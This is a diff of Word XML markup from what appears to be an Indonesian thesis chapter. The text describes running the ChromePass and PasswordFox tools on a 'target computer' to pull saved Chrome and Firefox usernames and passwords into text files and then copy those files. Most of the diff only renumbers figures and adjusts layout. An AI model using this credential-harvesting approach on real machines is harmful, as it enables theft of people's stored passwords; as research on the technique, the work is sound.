+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tersebut.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -37508,17 +37359,17 @@
         <w:keepNext/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="709"/>
+        <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66A3F66D" wp14:editId="7805B283">
-            <wp:extent cx="4542739" cy="1954900"/>
-            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
-            <wp:docPr id="64" name="Picture 64"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F730CF2" wp14:editId="7B1C5D44">
+            <wp:extent cx="4615891" cy="2966777"/>
+            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
+            <wp:docPr id="63" name="Picture 63"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -37538,7 +37389,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4558746" cy="1961788"/>
+                      <a:ext cx="4630389" cy="2976095"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -37554,13 +37405,13 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Caption"/>
-        <w:ind w:left="1440" w:firstLine="970"/>
+        <w:ind w:left="2410"/>
         <w:rPr>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="153" w:name="_Toc43425332"/>
+      <w:bookmarkStart w:id="152" w:name="_Toc43425331"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -37595,7 +37446,7 @@
           <w:bCs w:val="0"/>
           <w:noProof/>
         </w:rPr>
-        <w:t>11</w:t>
+        <w:t>10</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -37628,9 +37479,9 @@
           <w:bCs w:val="0"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve"> pada Mozilla Firefox</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="153"/>
+        <w:t xml:space="preserve"> pada Google Chrome</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="152"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -37640,242 +37491,20 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:keepNext/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="709"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Dalam percobaan </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">menjalankan </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ChromePass dan PasswordFox ini dilakukan beberapa perubahan parameter untuk menguji </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>berbagai</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> kondisi yang mungkin terjadi pada komputer target, berikut ini adalah beberapa skenario percobaan yang dilakukan oleh penulis.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading4"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="556"/>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Komputer Target </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Memiliki Kedua </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="24"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>Browser</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="1418"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>Pada Gambar V-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>12</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">dan Gambar V-13 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ditampilkan hasil program yang dijalankan </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">dengan kondisi komputer target memiliki kedua </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">browser </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>terinstal sehingga</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">file </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ChromePass.txt dan PasswordFox.txt berhasil dibuat untuk menyimpan </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">username </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">dan </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">password </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">dari </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">browser </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>Google Chrome dan Mozilla Firefox.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="1418"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Caption"/>
-        <w:keepNext/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="1418"/>
-        <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46151BFB" wp14:editId="4B108AA0">
-            <wp:extent cx="4132521" cy="2699309"/>
-            <wp:effectExtent l="0" t="0" r="1905" b="6350"/>
-            <wp:docPr id="66" name="Picture 66"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66A3F66D" wp14:editId="7805B283">
+            <wp:extent cx="4542739" cy="1954900"/>
+            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
+            <wp:docPr id="64" name="Picture 64"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -37895,7 +37524,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4184485" cy="2733251"/>
+                      <a:ext cx="4558746" cy="1961788"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -37911,14 +37540,13 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Caption"/>
-        <w:ind w:left="698" w:firstLine="720"/>
-        <w:jc w:val="center"/>
+        <w:ind w:left="1440" w:firstLine="970"/>
         <w:rPr>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="154" w:name="_Toc43425333"/>
+      <w:bookmarkStart w:id="153" w:name="_Toc43425332"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -37953,7 +37581,7 @@
           <w:bCs w:val="0"/>
           <w:noProof/>
         </w:rPr>
-        <w:t>12</w:t>
+        <w:t>11</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -37969,14 +37597,6 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
         <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Isi </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -37986,7 +37606,7 @@
           <w:iCs/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve">file </w:t>
+        <w:t>Login Data</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -37994,35 +37614,254 @@
           <w:bCs w:val="0"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t>ChromePass</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>.txt</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="154"/>
+        <w:t xml:space="preserve"> pada Mozilla Firefox</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="153"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Dalam percobaan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">menjalankan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ChromePass dan PasswordFox ini dilakukan beberapa perubahan parameter untuk menguji </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>berbagai</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> kondisi yang mungkin terjadi pada komputer target, berikut ini adalah beberapa skenario percobaan yang dilakukan oleh penulis.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="556"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Komputer Target </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Memiliki Kedua </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Browser</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1418"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Pada Gambar V-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>12</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">dan Gambar V-13 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ditampilkan hasil program yang dijalankan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">dengan kondisi komputer target memiliki kedua </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">browser </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>terinstal sehingga</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">file </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ChromePass.txt dan PasswordFox.txt berhasil dibuat untuk menyimpan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">username </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">dan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">password </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">dari </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">browser </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Google Chrome dan Mozilla Firefox.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1418"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
         <w:keepNext/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="1418"/>
+        <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67CB2D4D" wp14:editId="02685FB7">
-            <wp:extent cx="4117312" cy="4315968"/>
-            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
-            <wp:docPr id="67" name="Picture 67"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46151BFB" wp14:editId="4B108AA0">
+            <wp:extent cx="4132521" cy="2699309"/>
+            <wp:effectExtent l="0" t="0" r="1905" b="6350"/>
+            <wp:docPr id="66" name="Picture 66"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -38042,6 +37881,153 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
+                      <a:ext cx="4184485" cy="2733251"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:ind w:left="698" w:firstLine="720"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="154" w:name="_Toc43425333"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Gambar V- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Gambar_V- \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>12</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Isi </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">file </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>ChromePass</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>.txt</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="154"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:keepNext/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1418"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67CB2D4D" wp14:editId="02685FB7">
+            <wp:extent cx="4117312" cy="4315968"/>
+            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
+            <wp:docPr id="67" name="Picture 67"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId32"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
                       <a:ext cx="4137708" cy="4337348"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
@@ -38386,7 +38372,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill rotWithShape="1">
-                    <a:blip r:embed="rId32"/>
+                    <a:blip r:embed="rId33"/>
                     <a:srcRect l="708" t="933" r="1028" b="1585"/>
                     <a:stretch/>
                   </pic:blipFill>
@@ -38679,7 +38665,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill rotWithShape="1">
-                    <a:blip r:embed="rId33"/>
+                    <a:blip r:embed="rId34"/>
                     <a:srcRect l="1235" t="1163" r="686" b="1356"/>
                     <a:stretch/>
                   </pic:blipFill>
@@ -39104,7 +39090,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId34" cstate="print">
+                    <a:blip r:embed="rId35" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -39226,7 +39212,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="160" w:name="_Toc43426568"/>
+      <w:bookmarkStart w:id="160" w:name="_Toc43427735"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -39438,254 +39424,6 @@
             <wp:extent cx="4564684" cy="1723975"/>
             <wp:effectExtent l="0" t="0" r="7620" b="0"/>
             <wp:docPr id="69" name="Picture 69"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId35"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="4603466" cy="1738622"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Caption"/>
-        <w:ind w:firstLine="431"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="161" w:name="_Toc43425338"/>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Gambar V- </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:instrText xml:space="preserve"> SEQ Gambar_V- \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>17</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. Berhasil Menyalin </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">File </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>.txt</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="161"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Caption"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="709"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Caption"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="709"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
